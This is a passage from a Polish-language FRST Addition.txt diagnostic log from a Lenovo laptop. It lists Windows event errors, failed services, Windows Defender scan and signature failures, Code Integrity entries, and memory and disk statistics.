Identyfikator aplikacji względem pakietu powodującego błąd: Error: (10/08/2020 10:22:47 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: chrome.exe, wersja: 85.0.4183.121, sygnatura czasowa: 0x5f654c60 Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 6.3.9600.19724, sygnatura czasowa: 0x5ec5262a Kod wyjątku: 0xe0000008 Przesunięcie błędu: 0x0000000000007afc Identyfikator procesu powodującego błąd: 0x1ef0 Godzina uruchomienia aplikacji powodującej błąd: 0x01d69d3cfe75e062 Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Ścieżka modułu powodującego błąd: C:\Windows\system32\KERNELBASE.dll Identyfikator raportu: 691cfab0-09ac-11eb-8975-fcf8ae9b2e3a Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (10/07/2020 06:49:09 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: PSUAConsole.exe, wersja: 20.0.0.0, sygnatura czasowa: 0x5da94175 Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 6.3.9600.19724, sygnatura czasowa: 0x5ec50c3e Kod wyjątku: 0xe0434352 Przesunięcie błędu: 0x000156e8 Identyfikator procesu powodującego błąd: 0x2638 Godzina uruchomienia aplikacji powodującej błąd: 0x01d69cd21a817aab Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAConsole.exe Ścieżka modułu powodującego błąd: C:\Windows\SYSTEM32\KERNELBASE.dll Identyfikator raportu: 669a3f28-08c5-11eb-8974-fcf8ae9b2e3a Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (10/07/2020 06:49:05 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Aplikacja: PSUAConsole.exe Wersja architektury: v4.0.30319 Opis: proces został przerwany z powodu nieobsłużonego wyjątku. Informacje o wyjątku: System.NullReferenceException w PSUAConsole.ViewModel.Alerts.AlertCampaignsViewModel.CloseAction(CLOSE_TYPE, UInt32 ByRef) w PSUAConsole.ViewModel.Alerts.AlertsGenericViewModel.InternalCloseAction(CLOSE_TYPE, UInt32) w PSUAConsole.ViewModel.Alerts.AlertsGenericViewModel.InternalCloseByUserAction() Informacje o wyjątku: System.Reflection.TargetInvocationException w System.RuntimeMethodHandle.InvokeMethod(System.Object, System.Object[], System.Signature, Boolean) w System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(System.Object, System.Object[], System.Object[]) w System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags, System.Reflection.Binder, System.Object[], System.Globalization.CultureInfo) w GalaSoft.MvvmLight.Helpers.WeakAction.Execute() w GalaSoft.MvvmLight.Command.RelayCommand.Execute(System.Object) w MS.Internal.Commands.CommandHelpers.CriticalExecuteCommandSource(System.Windows.Input.ICommandSource, Boolean) w System.Windows.Controls.Primitives.ButtonBase.OnClick() w System.Windows.Controls.Button.OnClick() w System.Windows.Controls.Primitives.ButtonBase.OnMouseLeftButtonUp(System.Windows.Input.MouseButtonEventArgs) w System.Windows.UIElement.OnMouseLeftButtonUpThunk(System.Object, System.Windows.Input.MouseButtonEventArgs) w System.Windows.Input.MouseButtonEventArgs.InvokeEventHandler(System.Delegate, System.Object) w System.Windows.RoutedEventArgs.InvokeHandler(System.Delegate, System.Object) w System.Windows.RoutedEventHandlerInfo.InvokeHandler(System.Object, System.Windows.RoutedEventArgs) w System.Windows.EventRoute.InvokeHandlersImpl(System.Object, System.Windows.RoutedEventArgs, Boolean) w System.Windows.UIElement.ReRaiseEventAs(System.Windows.DependencyObject, System.Windows.RoutedEventArgs, System.Windows.RoutedEvent) w System.Windows.UIElement.OnMouseUpThunk(System.Object, System.Windows.Input.MouseButtonEventArgs) w System.Windows.Input.MouseButtonEventArgs.InvokeEventHandler(System.Delegate, System.Object) w System.Windows.RoutedEventArgs.InvokeHandler(System.Delegate, System.Object) w System.Windows.RoutedEventHandlerInfo.InvokeHandler(System.Object, System.Windows.RoutedEventArgs) w System.Windows.EventRoute.InvokeHandlersImpl(System.Object, System.Windows.RoutedEventArgs, Boolean) w System.Windows.UIElement.RaiseEventImpl(System.Windows.DependencyObject, System.Windows.RoutedEventArgs) w System.Windows.UIElement.RaiseTrustedEvent(System.Windows.RoutedEventArgs) w System.Windows.UIElement.RaiseEvent(System.Windows.RoutedEventArgs, Boolean) w System.Windows.Input.InputManager.ProcessStagingArea() w System.Windows.Input.InputManager.ProcessInput(System.Windows.Input.InputEventArgs) w System.Windows.Input.InputProviderSite.ReportInput(System.Windows.Input.InputReport) w System.Windows.Interop.HwndMouseInputProvider.ReportInput(IntPtr, System.Windows.Input.InputMode, Int32, System.Windows.Input.RawMouseActions, Int32, Int32, Int32) w System.Windows.Interop.HwndMouseInputProvider.FilterMessage(IntPtr, MS.Internal.Interop.WindowMessage, IntPtr, IntPtr, Boolean ByRef) w System.Windows.Interop.HwndSource.InputFilterMessage(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) w MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) w MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object) w System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) w System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) w System.Windows.Threading.Dispatcher.LegacyInvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32) w MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr) w MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef) w System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame) w System.Windows.Threading.Dispatcher.PushFrame(System.Windows.Threading.DispatcherFrame) w System.Windows.Window.ShowHelper(System.Object) w System.Windows.Window.Show() w System.Windows.Window.ShowDialog() w PandaConsole.App.OnStartup(System.Windows.StartupEventArgs) w System.Windows.Application.<.ctor>b__1_0(System.Object) w System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) w System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) w System.Windows.Threading.DispatcherOperation.InvokeImpl() w System.Windows.Threading.DispatcherOperation.InvokeInSecurityContext(System.Object) w System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) w System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) w System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) w MS.Internal.CulturePreservingExecutionContext.Run(MS.Internal.CulturePreservingExecutionContext, System.Threading.ContextCallback, System.Object) w System.Windows.Threading.DispatcherOperation.Invoke() w System.Windows.Threading.Dispatcher.ProcessQueue() w System.Windows.Threading.Dispatcher.WndProcHook(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) w MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) w MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object) w System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) w System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) w System.Windows.Threading.Dispatcher.LegacyInvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32) w MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr) w MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef) w System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame) w System.Windows.Threading.Dispatcher.PushFrame(System.Windows.Threading.DispatcherFrame) w System.Windows.Application.RunDispatcher(System.Object) w System.Windows.Application.RunInternal(System.Windows.Window) w System.Windows.Application.Run(System.Windows.Window) w System.Windows.Application.Run() w PandaConsole.App.Main() Error: (10/06/2020 07:12:08 PM) (Source: NvStreamSvc) (EventID: 1) (User: ) Description: Event-ID 1 Dziennik System: ============= Error: (01/17/2021 09:18:34 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa CSHMDR niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (01/17/2021 09:04:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi ComputerZLock z powodu następującego błędu: System nie może odnaleźć określonej ścieżki. Error: (01/17/2021 09:00:48 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Update Mgr RollAround z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (01/17/2021 09:00:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi ComputerZLock z powodu następującego błędu: System nie może odnaleźć określonej ścieżki. Error: (01/17/2021 09:00:37 AM) (Source: Microsoft-Windows-TaskScheduler) (EventID: 413) (User: ZARZĄDZANIE NT) Description: Usługa Harmonogram zadań nie może załadować zadań podczas uruchamiania usługi. Dane dodatkowe: Wartość błędu: 2147942402. Error: (01/17/2021 09:00:37 AM) (Source: Microsoft-Windows-TaskScheduler) (EventID: 413) (User: ZARZĄDZANIE NT) Description: Usługa Harmonogram zadań nie może załadować zadań podczas uruchamiania usługi. Dane dodatkowe: Wartość błędu: 2147942402. Error: (01/17/2021 09:00:37 AM) (Source: Microsoft-Windows-TaskScheduler) (EventID: 412) (User: ZARZĄDZANIE NT) Description: Usługa Harmonogram zadań nie może uruchomić zadań wyzwalanych podczas uruchamiania komputera. Dodatkowe dane: Wartość błędu: 2147942402. Error: (01/17/2021 09:00:28 AM) (Source: Service Control Manager) (EventID: 7003) (User: ) Description: Usługa Kompozycje zależy od następującej usługi: iThemes5. Ta usługa może nie być zainstalowana. Windows Defender: =================================== Date: 2017-02-12 13:51:12.066 Description: Skanowanie produktu Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {B1FB9A1E-3DEE-4C27-BB1C-83DF586DD721} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2017-02-11 20:48:26.505 Description: Skanowanie produktu Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {B9601693-179B-4C75-8526-B5ADD64E0854} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2017-02-11 20:43:18.313 Description: Skanowanie produktu Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {39CD8E46-65D3-4E50-B4B6-CEB4867DDA8B} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2017-02-11 20:18:12.299 Description: Skanowanie produktu Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {0175DCCC-757D-4EAD-8EA0-206E80993053} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2017-02-11 14:50:45.398 Description: Skanowanie produktu Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {F6D29E80-CF5C-432A-9931-5278D78DC706} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2020-09-02 17:26:30.595 Description: Produkt Windows Defender napotkał błąd podczas próby załadowania podpisów i podejmie próbę powrotu do znanego zestawu dobrych podpisów. Podpisy objęte próbą: Bieżące Kod błędu: 0x80070002 Opis błędu: Nie można odnaleźć określonego pliku. Wersja podpisu: 0.0.0.0;0.0.0.0 Wersja aparatu: 0.0.0.0 Date: 2017-02-22 15:24:22.659 Description: Działanie aparatu Windows Defender zostało zakończone z powodu nieoczekiwanego błędu. Typ błędu: Awaria Kod wyjątku: 0x80000003 Zasób: Date: 2017-02-22 15:24:22.552 Description: Działanie aparatu Windows Defender zostało zakończone z powodu nieoczekiwanego błędu. Typ błędu: Awaria Kod wyjątku: 0xc000000d Zasób: Date: 2017-02-21 15:15:48.037 Description: Agent ochrony w czasie rzeczywistym produktu Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: System inspekcji sieci Kod błędu: 0x80070003 Opis błędu: System nie może odnaleźć określonej ścieżki. Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę. Date: 2017-02-21 15:00:06.271 Description: Agent ochrony w czasie rzeczywistym produktu Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: System inspekcji sieci Kod błędu: 0x80070003 Opis błędu: System nie może odnaleźć określonej ścieżki. Przyczyna: W systemie brakuje aktualizacji wymaganych do uruchomienia systemu inspekcji sieci. Zainstaluj wymagane aktualizacje i ponownie uruchom komputer. CodeIntegrity: =================================== Date: 2017-02-12 12:26:07.107 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-02-11 11:24:57.495 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-02-05 12:47:43.195 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-02-04 11:31:36.985 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-01-28 11:55:24.192 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-01-22 19:20:55.956 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-01-15 18:23:34.580 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-01-08 11:51:57.117 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. ==================== Statystyki pamięci =========================== BIOS: LENOVO 7FCN35WW 09/02/2013 Płyta główna: LENOVO Durian 7A1 Procesor: Intel(R) Core(TM) i5-4200M CPU @ 2.50GHz Procent pamięci w użyciu: 82% Całkowita pamięć fizyczna: 4008.27 MB Dostępna pamięć fizyczna: 693.07 MB Całkowita pamięć wirtualna: 7208.27 MB Dostępna pamięć wirtualna: 1349.38 MB ==================== Dyski ================================ Drive c: (Windows) (Fixed) (Total:100 GB) (Free:4.92 GB) NTFS Drive d: (DATA) (Fixed) (Total:831.04 GB) (Free:830.83 GB) NTFS ==================== MBR & Tablica partycji ==================== ========================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: A36C4F46) Partition: GPT. ==================== Koniec Addition.txt =======================